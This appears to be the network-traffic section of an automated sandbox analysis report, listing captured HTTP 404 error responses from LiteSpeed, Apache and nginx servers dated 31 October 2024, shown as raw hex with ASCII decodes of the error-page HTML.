b8 78 96 e2 8f e3 6f 67 1f a0 c8 b5 06 de 4e fa 15 20 32 cf d2 d2 bd 0f 53 2f bb 39 e8 ab 5c d9 4b 7b db fb 6a 79 59 59 55 5d 02 ed 38 ee cd e2 0b 6a 9e d5 3f 44 90 7f f9 a3 d5 85 6b 95 59 fa f9 7a 6c 78 bd be 87 e4 67 2a b8 e2 ec 22 53 bb ba 9c eb cb 77 cd 82 f3 f6 7b dd f7 8e e2 66 c3 d7 d3 22 97 f6 21 bf 3d 96 7a 60 00 c3 fb 40 5c 57 68 2d dc dc b5 80 ce 80 1b 79 fe f9 46 ae 67 ff 6a e6 eb ae 18 85 d3 04 fd 7e da eb d8 e4 d2 de c6 ae 4e 79 cb 91 f5 c9 a1 7e 9d c4 7d 58 b9 49 79 43 e6 3b 92 30 80 a3 1f 4c 29 4c df 4c 99 c2 3f 01 da b5 3e 6e a8 bf e0 78 9f 55 55 96 3c 0c fa 3d de 0e db cb eb 0a 4b e8 e8 7a f0 4a 12 ef e8 df 8a a1 57 f7 bd e3 da 59 61 f5 fa 7b 18 00 97 e2 16 bd 13 7a bf d1 ab c4 81 3f 62 d8 2b 6d 7c ba cf 43 90 35 6e 71 85 af f7 6c 3c 78 99 5d 97 9f 0f 5b c0 cf 34 b7 96 f3 ca 04 46 8f 08 6a f4 c6 e0 15 13 9f a3 f8 d5 af 7d a4 a8 5f 10 63 1d df e8 e6 bb a5 85 e9 c5 67 7f e0 f3 e2 b0 ac ee 2f 61 a5 07 7c ea 0e b2 ba 2a 43 e0 10 fa 8f 37 f6 7b 45 be 72 77 e3 8c bf c3 eb aa ff ed b4 80 a7 38 bc 61 cb 8b b3 de be 7a cf f8 7e 87 8b a6 ad 38 f4 81 92 6d 70 43 70 8b b7 f1 37 92 5f 6f ec e6 05 f4 1f ed 74 09 b8 20 46 7d e6 c3 7a 47 70 1f 26 96 7f ab c6 ef 87 fa d4 f7 5e 96 f6 b7 1c 10 a0 6e cf d7 c7 dc f6 25 3e ee b3 d8 79 3b 45 2f c7 eb 53 fe 28 83 36 2b 9c fb 3d c0 48 04 62 54 ff e7 de 8a e3 f7 04 7e e9 54 20 a8 03 70 0f 80 a
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkeddate: Thu, 31 Oct 2024 09:26:21 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 32 37 38 36 0d 0a 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:26:27 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:26:29 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:26:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:26:34 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 09:26:40 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 09:26:43 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 09:26:46 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 31 Oct 2024 09:26:48 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:02 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 31 Oct 2024 09:28:05 GMTServer: ApacheLast-Modified: Wed, 30 Oct 2024 18:34:18 GMTETag: "49d-625b5f32466a6"Accept-Ranges: bytesContent-Length: 1181Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 0d 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0d 0a 20 20 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 7b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 32 35 30 70 78 3b 0d 0a 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 35 70 78 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 62 6c 61 63 6b 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 20 20 72 67 62 61 28 31 33 35 2c 31 33 35 2c 31 33 35 2c 31 29 20 30 25 2c 72 67 62 61 28 30 2c 30 2c 30 2c 31 29 20 31 30 30 25 29 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 30 70 78 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 3a 61 66 74 65 72 20 7b 0d 0a 20 20 20 20 63 6f 6e 74 65 6e 74 3a 20 22 22 3b 0d 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0d 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 2d 31 38 70 78 3b 0d 0a 20 20 20 20 6c 65 66 74 3a 20 31 30 32 70 78 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 20 73 6f 6c 69 64 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 77 69 64 74 68 3a 20 31 38 70 78 20 32 31 70 78 20 30 3b 0d 0a 20 20 20 20 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 30 3b 0d 0a 20 20 20 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 0d 0a 7d 0d 0a 2e 73 70 65 61 63 68 62 75 62 62 6c 65 20 73 70 61 6e 20 7b 0d 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 0d 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0d 0a 20 20 20 20 66 6f 6e 74 3a 37 32 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 31 30 70 78 3b 0d 0a 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 34 70 78 20 34 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 2e 33 29 3b 0d 0a 7d 0d 0a 2e 6d 65 73 73 61 67 65 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 3a 32 34 70 78 20 61 72 69 61 6c 3b 0d 0a 20 20 20 2
